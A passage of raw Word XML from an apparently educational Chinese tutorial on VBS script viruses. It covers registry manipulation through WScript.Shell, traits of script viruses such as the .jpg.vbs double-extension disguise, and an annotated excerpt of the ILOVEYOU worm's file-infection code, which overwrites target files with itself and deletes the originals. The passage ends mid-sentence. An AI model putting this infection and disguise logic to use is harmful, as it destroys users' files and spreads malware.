        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2270" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3112" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>HKEY_CURRENT_CONFIG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidTr="002627A0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>HKCR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>HKEY_CLASSES_ROOT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2270" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3112" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E54F3F" w:rsidRDefault="00E54F3F" w:rsidP="007343F5">
      <w:pPr>
        <w:ind w:left="840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2）主键路径。主键路径就是目标键在注册表中的主键位置，各个主键之间用“</w:t>
      </w:r>
      <w:r>
        <w:t>\”分隔，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02A8B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>\Software\Microsoft\Windows\CurrentVersion\RainbowOnSites”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4798" w:rsidRDefault="007343F5" w:rsidP="00101AA6">
      <w:pPr>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00E54F3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键值。键值参数可以省去不写，这时，所有的操作都只针对整个主键进行，而不是该主键的某个值。如果想对某个主键下的某个键值进行操作，则应包含一部分，直接接在主键路径之后即可。例如，一个完整的参数如下所示：</w:t>
      </w:r>
      <w:r w:rsidR="00AB1DE4" w:rsidRPr="00AB1DE4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>"HKCU\Software\Microsoft\Windows\CurrentVersion\RainbowOnSites\NoRun"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00AB1DE4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面是一个操作注册表的程序，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>Dim RegWsh,sReadKey,sPrompt,sFixprompt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>Set RegWsh = WScript.CreateObject("WScript.Shell")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>RegWsh.RegWrite "HKCU\MyRegKey\", "一级键值"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>sReadKey=RegWsh.RegRead("HKCU\MyRegKey\")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>sPrompt="(默认)键值为：'"&amp;sReadKey&amp;"'"&amp;sFixprompt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>msgbox "读取的HKCU\MyRegKey\下"&amp;sPrompt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>RegWsh.RegWrite "HKCU\MyRegKey\Entry\", "二级子键"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00770240" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>sReadKey=RegWsh.RegRead("HKCU\MyRegKey\Entry\")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>sPrompt="(默认)键值为：'"&amp;sReadKey&amp;"'"&amp; sReadKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>msgbox "读取的HKCU\MyRegKey\Entry\下"&amp;sPrompt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRPr="00770240" w:rsidRDefault="00AB1DE4" w:rsidP="00770240"/>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>RegWsh.RegWrite "HKCU\MyRegKey\Entry\", "修改后的二级子键"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>sReadKey=RegWsh.RegRead("HKCU\MyRegKey\Entry\")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>sPrompt="(默认)键值已经修改为：'"&amp;sReadKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>msgbox "读取的HKCU\MyRegKey\Entry\下"&amp;sPrompt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:r>
        <w:t>MsgBox"将数值项HKCU\MyRegKey\Value 设为字符类型（REG_SZ），数值为1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DE4" w:rsidRPr="00AB1DE4" w:rsidRDefault="00AB1DE4" w:rsidP="00770240">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RegWsh.RegWrite "HKCU\MyRegKey\Value", 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002627A0" w:rsidRDefault="002627A0" w:rsidP="00CD4798"/>
    <w:p w:rsidR="008D6282" w:rsidRDefault="008D6282" w:rsidP="008D6282">
      <w:r>
        <w:t>MsgBox "将数值项HKCU\MyRegKey\Entry 设为 双字节型（REG_DWORD），数值为2"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6282" w:rsidRDefault="008D6282" w:rsidP="00770240">
      <w:r>
        <w:t>RegWsh.RegWrite "HKCU\MyRegKey\Entry", 2, "REG_DWORD"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6282" w:rsidRPr="00770240" w:rsidRDefault="008D6282" w:rsidP="00770240"/>
    <w:p w:rsidR="008D6282" w:rsidRDefault="008D6282" w:rsidP="00770240">
      <w:r>
        <w:t>MsgBox "将数值项HKCU\MyRegKey\Entry\Value1设为二进制类型（REG_BINARY），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数值为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6282" w:rsidRDefault="008D6282" w:rsidP="00770240">
      <w:r>
        <w:t>RegWsh.RegWrite "HKCU\MyRegKey\Entry\Value1",3, "REG_BINARY"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6282" w:rsidRPr="00770240" w:rsidRDefault="008D6282" w:rsidP="00770240"/>
    <w:p w:rsidR="008D6282" w:rsidRDefault="008D6282" w:rsidP="00770240">
      <w:r>
        <w:t>MsgBox "以下将删除HKCU\MyRegKey\Entry\Value1数值"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6282" w:rsidRDefault="008D6282" w:rsidP="00770240">
      <w:r>
        <w:t>RegWsh.RegDelete "HKCU\MyRegKey\Entry\Value1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6282" w:rsidRDefault="008D6282" w:rsidP="00770240">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008D6282" w:rsidRDefault="008D6282" w:rsidP="00770240">
      <w:r>
        <w:t>MsgBox "以下将删除HKCU\MyRegKey\Entry主键"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6282" w:rsidRDefault="008D6282" w:rsidP="00770240">
      <w:r>
        <w:t>RegWsh.RegDelete "HKCU\MyRegKey\Entry\"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6282" w:rsidRDefault="008D6282" w:rsidP="00770240">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008D6282" w:rsidRDefault="008D6282" w:rsidP="00770240">
      <w:r>
        <w:t>MsgBox "以下将删除HKCU\MyRegKey主键"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6282" w:rsidRDefault="008D6282" w:rsidP="00770240">
      <w:r>
        <w:t>RegWsh.RegDelete "HKCU\MyRegKey\"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4BD8" w:rsidRDefault="008A4BD8" w:rsidP="00770240">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只要把上面的</w:t>
      </w:r>
      <w:r>
        <w:t>VBScript编写的操作注册表的代码放在网页文件中，不用对代码进行任</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>何修改，只需要在上面的代码前后分别加上</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;script language=VBScript&gt;&lt;/script&gt;即可。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用它可以修改</w:t>
      </w:r>
      <w:r>
        <w:t>IE浏览器的主页、可以修改系统的各个参数，万花谷病毒就</w:t>
      </w:r>
      <w:r w:rsidR="005504E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>充分利用了注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>册表，以达到破坏的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E1E9A" w:rsidRDefault="006D2288" w:rsidP="006D2288">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三、特点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2288" w:rsidRDefault="006D2288" w:rsidP="0093276F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>VBScript</w:t>
      </w:r>
      <w:r w:rsidR="0093276F">
        <w:t>为例</w:t>
      </w:r>
      <w:r w:rsidR="004B48F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>VBScript利用Windows系统的开放性特点，通过调用一些现成的Windows对象、组件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidR="008C2F20">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接对文件系统、注册表等进行控制，功能非常强大。应该说病毒就是这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种思想，但是这种思想在用</w:t>
      </w:r>
      <w:r>
        <w:t>VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2288" w:rsidRDefault="00482673" w:rsidP="00F61D65">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>编写简单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="006D2288">
        <w:t>一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病</w:t>
      </w:r>
      <w:r w:rsidR="006D2288">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>毒来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2288" w:rsidRDefault="006D2288" w:rsidP="00F61D65">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>破坏</w:t>
      </w:r>
      <w:r w:rsidR="00482673">
        <w:t>力大。其破坏力不仅表现在对用户系统文件及性能的破坏。</w:t>
      </w:r>
      <w:r>
        <w:t>还可以使邮件服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>崩溃，网络发生严重阻塞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2288" w:rsidRDefault="006D2288" w:rsidP="00F61D65">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>感染力强。由于脚本是直接解释执行，并且它不需要像PE病毒那样，需要做复杂的PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件格式处理，因此这类病毒可以直接通过自我复制的方式感染其他同类文件，并且自我的异常处理变得非常容易。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2288" w:rsidRDefault="006D2288" w:rsidP="00F61D65">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>传播范围大。这类病毒通过htm文档，Email附件或其它方式，可以在很短时间内传遍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>世界各地。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2288" w:rsidRDefault="006D2288" w:rsidP="00F61D65">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>病毒源码容易被获取，变种多。由于VBS病毒解释执行，其源代码可读性非常强，即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使病毒源码经过加密处理后，其源代码的获取还是比较简单。因此，这类病毒变种比较多，稍微改变一下病毒的结构，或者修改一下特征值，很多杀毒软件可能就无能为力。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2288" w:rsidRDefault="00433AFA" w:rsidP="00F61D65">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>欺骗性强</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="006D2288">
        <w:t>脚本病毒为了得到运行机会，往往会采用各种让用户不大注意的手段，譬如，</w:t>
      </w:r>
      <w:r w:rsidR="006D2288">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件的附件名采用双后缀，如</w:t>
      </w:r>
      <w:r w:rsidR="006D2288">
        <w:t>.jpg.vbs，由于系统默认不显示后缀，这样，用户看到这个</w:t>
      </w:r>
      <w:r w:rsidR="006D2288">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的时候，就会认为它是一个</w:t>
      </w:r>
      <w:r w:rsidR="006D2288">
        <w:t>jpg图片文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2288" w:rsidRDefault="006D2288" w:rsidP="00F61D65">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>使得病毒生产机实现起来非常容易。所谓病毒生产机，就是可以按照用户的意愿，生产</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒的机器（当然，这里指的是程序），目前的病毒生产机，之所以大多数都为脚本病毒生产机，其中最重要的一点还是因为脚本是解释执行的，实现起来非常容易，具体将在我们后面谈及。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00433AFA" w:rsidRDefault="00433AFA" w:rsidP="00433AFA">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>四、原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00433AFA" w:rsidRDefault="00433AFA" w:rsidP="00433AFA">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00433AFA">
        <w:t>vbs脚本病毒如何感染、搜索文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00433AFA" w:rsidRDefault="00433AFA" w:rsidP="001E1F9F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>VBS</w:t>
      </w:r>
      <w:r w:rsidR="00F61D65">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>脚本病毒一般是直接通过自我复制来感染文件的，病毒中的绝大部分代码都可以直</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接附加在其他同类程序的中间，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="0057203C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>新欢乐时光病毒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是将自己的代码附加在</w:t>
      </w:r>
      <w:r>
        <w:t>.htm文件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尾部，并在顶部加入一条调用病毒代码的语句，而</w:t>
      </w:r>
      <w:r w:rsidRPr="007473BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>爱虫病毒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则是直接生成一个文件的副本，将病毒代码拷入其中，并以原文件名作为病毒文件名的前缀，</w:t>
      </w:r>
      <w:r>
        <w:t>vbs作为后缀。下面我们通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1BFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>爱虫病毒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的部分代码具体分析一下这类病毒的感染和搜索原理，以下是文件感染的部分关键代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1F9F" w:rsidRDefault="001E1F9F" w:rsidP="001E1F9F">
      <w:r>
        <w:tab/>
        <w:t>Set fso=createobject("scripting.filesystemobject")</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//创建一个文件系统对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1F9F" w:rsidRDefault="001E1F9F" w:rsidP="001E1F9F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>set self=fso.opentextfile(wscript.scriptfullname,1)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//读打开当前文件（即病毒本身）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1F9F" w:rsidRDefault="001E1F9F" w:rsidP="001E1F9F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>vbscopy=self.readall</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//读取病毒全部代码到字符串变量vbscopy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1F9F" w:rsidRDefault="001E1F9F" w:rsidP="001E1F9F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>set ap=fso.opentextfile(目标文件.path,2,true)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//写打开目标文件，准备写入病毒代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1F9F" w:rsidRDefault="001E1F9F" w:rsidP="001E1F9F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>ap.write vbscopy '</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//将病毒代码覆盖目标文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1F9F" w:rsidRDefault="001E1F9F" w:rsidP="001E1F9F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>ap.close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1F9F" w:rsidRDefault="001E1F9F" w:rsidP="001E1F9F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>set cop=fso.getfile("C:\test.txt")</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//得到目标文件路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1F9F" w:rsidRDefault="001E1F9F" w:rsidP="001E1F9F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>cop.copy("C:\test.txt" &amp; ".vbs") '</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//创建另外一个病毒文件（以.vbs 为后缀）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E1F9F" w:rsidRDefault="001E1F9F" w:rsidP="001E1F9F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标文件</w:t>
      </w:r>
      <w:r>
        <w:t>.delete(true)</w:t>
      </w:r>
      <w:r w:rsidR="005843E6" w:rsidRPr="005843E6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005843E6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005843E6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005843E6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005843E6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005843E6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005843E6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005843E6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005843E6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005843E6" w:rsidRPr="005843E6">
        <w:t>//删除目标文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175A28" w:rsidRDefault="00175A28" w:rsidP="00175A28">
      <w:r w:rsidRPr="00175A28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>原理：</w:t>
      </w:r>
      <w:r w:rsidRPr="00175A28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先将病毒自身代码赋给字符串变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00175A28">
        <w:t>vbscopy，然后将这个字符串覆盖写到目标文件，并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本test.txt.vbs，最后删除目标文件。如果文件夹设置为"隐藏已知文</w:t>
      </w:r>
      <w:r w:rsidR="007929C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>件类型的扩展名</w:t>
